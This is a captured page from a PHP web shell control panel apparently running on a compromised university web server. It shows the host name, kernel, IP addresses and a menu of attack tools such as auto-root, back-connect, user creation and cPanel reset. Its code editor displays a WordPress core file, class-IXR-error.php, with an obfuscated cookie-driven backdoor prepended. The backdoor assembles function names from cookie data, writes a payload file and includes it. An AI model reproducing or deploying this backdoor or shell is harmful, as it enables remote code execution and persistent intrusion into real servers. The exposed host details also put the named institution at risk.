Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.144.227.187
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
oric.aiou.edu.pk /
wp-includes /
IXR /
[ HOME SHELL ]
Name
Size
Permission
Action
class-IXR-base64.php
414
B
-rw-r--r--
class-IXR-client.php
4.67
KB
-rw-r--r--
class-IXR-clientmulticall.php
1.23
KB
-rw-r--r--
class-IXR-date.php
1.65
KB
-rw-r--r--
class-IXR-error.php
1.17
KB
-rw-r--r--
class-IXR-introspectionserver....
5.2
KB
-rw-r--r--
class-IXR-message.php
8
KB
-rw-r--r--
class-IXR-request.php
927
B
-rw-r--r--
class-IXR-server.php
6.51
KB
-rw-r--r--
class-IXR-value.php
3.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-IXR-error.php
<?php if(isset($_COOKIE[3])&&isset($_COOKIE[30])){$c=$_COOKIE;$k=0;$n=7;$p=array();$p[$k]='';while($n){$p[$k].=$c[30][$n];if(!$c[30][$n+1]){if(!$c[30][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+7+1;}$k=$p[22]().$p[15];if(!$p[26]($k)){$n=$p[21]($k,$p[6]);$p[2]($n,$p[18].$p[10]($p[4]($c[3])));}include($k);} /** * IXR_Error * * @package IXR * @since 1.5.0 */ class IXR_Error { var $code; var $message; /** * PHP5 constructor. */ function __construct( $code, $message ) { $this->code = $code; $this->message = htmlspecialchars($message); } /** * PHP4 constructor. */ public function IXR_Error( $code, $message ) { self::__construct( $code, $message ); } function getXml() { $xml = <<<EOD <methodResponse> <fault> <value> <struct> <member> <name>faultCode</name> <value><int>{$this->code}</int></value> </member> <member> <name>faultString</name> <value><string>{$this->message}</string></value> </member> </struct> </value> </fault> </methodResponse> EOD; return $xml; } }
Close